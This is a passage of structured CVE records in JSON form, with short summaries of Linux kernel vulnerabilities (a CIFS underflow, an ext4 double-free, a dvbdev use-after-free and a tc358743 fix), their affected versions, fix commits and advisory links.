"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"name": "RHSA-2024:2093",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"name": "RHSA-2024:2394",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2394"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0565"
},
{
"name": "RHBZ#2258518",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258518"
},
{
"url": "https://www.spinics.net/lists/stable-commits/msg328851.html"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-01-15T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-18T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: cifs filesystem decryption improper input validation remote code execution vulnerability in function receive_encrypted_standard of client",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-191: Integer Underflow (Wrap or Wraparound)"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-0565",
"datePublished": "2024-01-15T20:02:02.639Z",
"dateReserved": "2024-01-15T19:19:12.076Z",
"dateUpdated": "2025-11-06T19:54:35.381Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26704 (GCVE-0-2024-26704)
Vulnerability from cvelistv5
Published
2024-04-03 14:55
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix double-free of blocks due to wrong extents moved_len
In ext4_move_extents(), moved_len is only updated when all moves are
successfully executed, and only discards orig_inode and donor_inode
preallocations when moved_len is not zero. When the loop fails to exit
after successfully moving some extents, moved_len is not updated and
remains at 0, so it does not discard the preallocations.
If the moved extents overlap with the preallocated extents, the
overlapped extents are freed twice in ext4_mb_release_inode_pa() and
ext4_process_freed_data() (as described in commit 94d7c16cbbbd ("ext4:
Fix double-free of blocks with EXT4_IOC_MOVE_EXT")), and bb_free is
incremented twice. Hence when trim is executed, a zero-division bug is
triggered in mb_update_avg_fragment_size() because bb_free is not zero
and bb_fragments is zero.
Therefore, update move_len after each extent move to avoid the issue.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a Version: fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.613Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4fbb89d722cbb16beaaea234b7230faaaf68c71"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afbcad9ae7d6d11608399188f03a837451b6b3a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d033a555d9a1cf53dbf3301af7199cc4a4c8f537"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afba9d11320dad5ce222ac8964caf64b7b4bedb1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/185eab30486ba3e7bf8b9c2e049c79a06ffd2bc1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2883940b19c38d5884c8626483811acf4d7e148f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/559ddacb90da1d8786dd8ec4fd76bbfa404eaef6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55583e899a5357308274601364741a83e78d6ac4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26704",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:52:39.832740Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:27.505Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/move_extent.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b4fbb89d722cbb16beaaea234b7230faaaf68c71",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
},
{
"lessThan": "afbcad9ae7d6d11608399188f03a837451b6b3a1",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
},
{
"lessThan": "d033a555d9a1cf53dbf3301af7199cc4a4c8f537",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
},
{
"lessThan": "afba9d11320dad5ce222ac8964caf64b7b4bedb1",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
},
{
"lessThan": "185eab30486ba3e7bf8b9c2e049c79a06ffd2bc1",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
},
{
"lessThan": "2883940b19c38d5884c8626483811acf4d7e148f",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
},
{
"lessThan": "559ddacb90da1d8786dd8ec4fd76bbfa404eaef6",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
},
{
"lessThan": "55583e899a5357308274601364741a83e78d6ac4",
"status": "affected",
"version": "fcf6b1b729bcd23f2b49a84fb33ffbb44712ee6a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/move_extent.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix double-free of blocks due to wrong extents moved_len\n\nIn ext4_move_extents(), moved_len is only updated when all moves are\nsuccessfully executed, and only discards orig_inode and donor_inode\npreallocations when moved_len is not zero. When the loop fails to exit\nafter successfully moving some extents, moved_len is not updated and\nremains at 0, so it does not discard the preallocations.\n\nIf the moved extents overlap with the preallocated extents, the\noverlapped extents are freed twice in ext4_mb_release_inode_pa() and\next4_process_freed_data() (as described in commit 94d7c16cbbbd (\"ext4:\nFix double-free of blocks with EXT4_IOC_MOVE_EXT\")), and bb_free is\nincremented twice. Hence when trim is executed, a zero-division bug is\ntriggered in mb_update_avg_fragment_size() because bb_free is not zero\nand bb_fragments is zero.\n\nTherefore, update move_len after each extent move to avoid the issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:27.242Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b4fbb89d722cbb16beaaea234b7230faaaf68c71"
},
{
"url": "https://git.kernel.org/stable/c/afbcad9ae7d6d11608399188f03a837451b6b3a1"
},
{
"url": "https://git.kernel.org/stable/c/d033a555d9a1cf53dbf3301af7199cc4a4c8f537"
},
{
"url": "https://git.kernel.org/stable/c/afba9d11320dad5ce222ac8964caf64b7b4bedb1"
},
{
"url": "https://git.kernel.org/stable/c/185eab30486ba3e7bf8b9c2e049c79a06ffd2bc1"
},
{
"url": "https://git.kernel.org/stable/c/2883940b19c38d5884c8626483811acf4d7e148f"
},
{
"url": "https://git.kernel.org/stable/c/559ddacb90da1d8786dd8ec4fd76bbfa404eaef6"
},
{
"url": "https://git.kernel.org/stable/c/55583e899a5357308274601364741a83e78d6ac4"
}
],
"title": "ext4: fix double-free of blocks due to wrong extents moved_len",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26704",
"datePublished": "2024-04-03T14:55:02.672Z",
"dateReserved": "2024-02-19T14:20:24.158Z",
"dateUpdated": "2025-05-04T08:54:27.242Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27043 (GCVE-0-2024-27043)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: edia: dvbdev: fix a use-after-free
In dvb_register_device, *pdvbdev is set equal to dvbdev, which is freed
in several error-handling paths. However, *pdvbdev is not set to NULL
after dvbdev's deallocation, causing use-after-frees in many places,
for example, in the following call chain:
budget_register
|-> dvb_dmxdev_init
|-> dvb_register_device
|-> dvb_dmxdev_release
|-> dvb_unregister_device
|-> dvb_remove_device
|-> dvb_device_put
|-> kref_put
When calling dvb_unregister_device, dmxdev->dvbdev (i.e. *pdvbdev in
dvb_register_device) could point to memory that had been freed in
dvb_register_device. Thereafter, this pointer is transferred to
kref_put and triggering a use-after-free.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e Version: b61901024776b25ce7b8edc31bb1757c7382a88e |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.899Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d0f5c28333822f9baa5280d813124920720fd856"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f20c3270f3ed5aa6919a87e4de9bf6c05fb57086"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/096237039d00c839f3e3a5fe6d001bf0db45b644"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d3fe80b6d175c220b3e252efc6c6777e700e98e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/437a111f79a2f5b2a5f21e27fdec6f40c8768712"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/779e8db7efb22316c8581d6c229636d2f5694a62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35674111a043b0482a9bc69da8850a83f465b07d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7586e902128e4fb7bfbb661cb52e4215a65637b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c64f4cdf4e6cc5682c52523713af8c39c94e6d5"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27043",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-15T19:22:34.576999Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-15T19:22:42.564Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/dvb-core/dvbdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d0f5c28333822f9baa5280d813124920720fd856",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "f20c3270f3ed5aa6919a87e4de9bf6c05fb57086",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "096237039d00c839f3e3a5fe6d001bf0db45b644",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "0d3fe80b6d175c220b3e252efc6c6777e700e98e",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "437a111f79a2f5b2a5f21e27fdec6f40c8768712",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "779e8db7efb22316c8581d6c229636d2f5694a62",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "35674111a043b0482a9bc69da8850a83f465b07d",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "b7586e902128e4fb7bfbb661cb52e4215a65637b",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
},
{
"lessThan": "8c64f4cdf4e6cc5682c52523713af8c39c94e6d5",
"status": "affected",
"version": "b61901024776b25ce7b8edc31bb1757c7382a88e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/dvb-core/dvbdev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.21"
},
{
"lessThan": "2.6.21",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.21",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: edia: dvbdev: fix a use-after-free\n\nIn dvb_register_device, *pdvbdev is set equal to dvbdev, which is freed\nin several error-handling paths. However, *pdvbdev is not set to NULL\nafter dvbdev\u0027s deallocation, causing use-after-frees in many places,\nfor example, in the following call chain:\n\nbudget_register\n |-\u003e dvb_dmxdev_init\n |-\u003e dvb_register_device\n |-\u003e dvb_dmxdev_release\n |-\u003e dvb_unregister_device\n |-\u003e dvb_remove_device\n |-\u003e dvb_device_put\n |-\u003e kref_put\n\nWhen calling dvb_unregister_device, dmxdev-\u003edvbdev (i.e. *pdvbdev in\ndvb_register_device) could point to memory that had been freed in\ndvb_register_device. Thereafter, this pointer is transferred to\nkref_put and triggering a use-after-free."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:57.936Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d0f5c28333822f9baa5280d813124920720fd856"
},
{
"url": "https://git.kernel.org/stable/c/f20c3270f3ed5aa6919a87e4de9bf6c05fb57086"
},
{
"url": "https://git.kernel.org/stable/c/096237039d00c839f3e3a5fe6d001bf0db45b644"
},
{
"url": "https://git.kernel.org/stable/c/0d3fe80b6d175c220b3e252efc6c6777e700e98e"
},
{
"url": "https://git.kernel.org/stable/c/437a111f79a2f5b2a5f21e27fdec6f40c8768712"
},
{
"url": "https://git.kernel.org/stable/c/779e8db7efb22316c8581d6c229636d2f5694a62"
},
{
"url": "https://git.kernel.org/stable/c/35674111a043b0482a9bc69da8850a83f465b07d"
},
{
"url": "https://git.kernel.org/stable/c/b7586e902128e4fb7bfbb661cb52e4215a65637b"
},
{
"url": "https://git.kernel.org/stable/c/8c64f4cdf4e6cc5682c52523713af8c39c94e6d5"
}
],
"title": "media: edia: dvbdev: fix a use-after-free",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27043",
"datePublished": "2024-05-01T12:54:11.197Z",
"dateReserved": "2024-02-19T14:20:24.212Z",
"dateUpdated": "2025-05-04T09:02:57.936Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35830 (GCVE-0-2024-35830)
Vulnerability from cvelistv5
Published
2024-05-17 13:41
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: tc358743: register v4l2 async device only after successful setup
Ensure the device has been setup correctly before registering the v4l2
async device, thus allowing userspace to access.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc Version: 4c5211a100399c3823563193dd881dcb3b7d24fc |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.478Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17c2650de14842c25c569cbb2126c421489a3a24"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/daf21394f9898fb9f0698c3e50de08132d2164e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/610f20e5cf35ca9c0992693cae0dd8643ce932e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b8505a1aee8f1edc9d16d72ae09c93de086e2a1a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ba8db9786b55047df5ad3db3e01dd886687a77d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edbb3226c985469a2f8eb69885055c9f5550f468"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c915c46a25c3efb084c4f5e69a053d7f7a635496"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4f1490a5d7a0472ee5d9f36547bc4ba46be755c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/87399f1ff92203d65f1febf5919429f4bb613a02"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35830",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:42:22.059592Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:20.797Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/i2c/tc358743.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "17c2650de14842c25c569cbb2126c421489a3a24",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "daf21394f9898fb9f0698c3e50de08132d2164e6",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "610f20e5cf35ca9c0992693cae0dd8643ce932e7",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "b8505a1aee8f1edc9d16d72ae09c93de086e2a1a",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "8ba8db9786b55047df5ad3db3e01dd886687a77d",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "edbb3226c985469a2f8eb69885055c9f5550f468",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "c915c46a25c3efb084c4f5e69a053d7f7a635496",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "4f1490a5d7a0472ee5d9f36547bc4ba46be755c7",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
},
{
"lessThan": "87399f1ff92203d65f1febf5919429f4bb613a02",
"status": "affected",
"version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/i2c/tc358743.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.3"
},
{
"lessThan": "4.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
